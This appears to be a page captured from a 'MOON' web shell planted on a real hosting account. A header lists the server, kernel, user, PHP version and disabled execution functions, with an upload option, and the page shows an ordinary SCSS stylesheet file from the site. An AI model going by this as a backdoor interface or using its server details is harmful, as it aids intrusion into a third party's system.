MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/imensosw/www/imenso.co/demo/pagetosite/assets/sass/_variables.scss
// Background-Colors
$background__dark : #F5F5F5;
$background__light: #FFFFFF;
$background__theme: #0052cc;
$background__theme-hover: #0047B3;
$background__theme-2: #D02A79;



// Text-Colors
$color__light: #FFF;
$color__dark : #333;
$color__anchor: #0052cc;


// Font-Family
$font__family: 'Work Sans', sans-serif;
$font__line-height-body: 1.5;
$font__line-height-pre: 1.6;

// Section top-bottom Space Desktop: 5X, Mobile 3X  
$spacer:20px;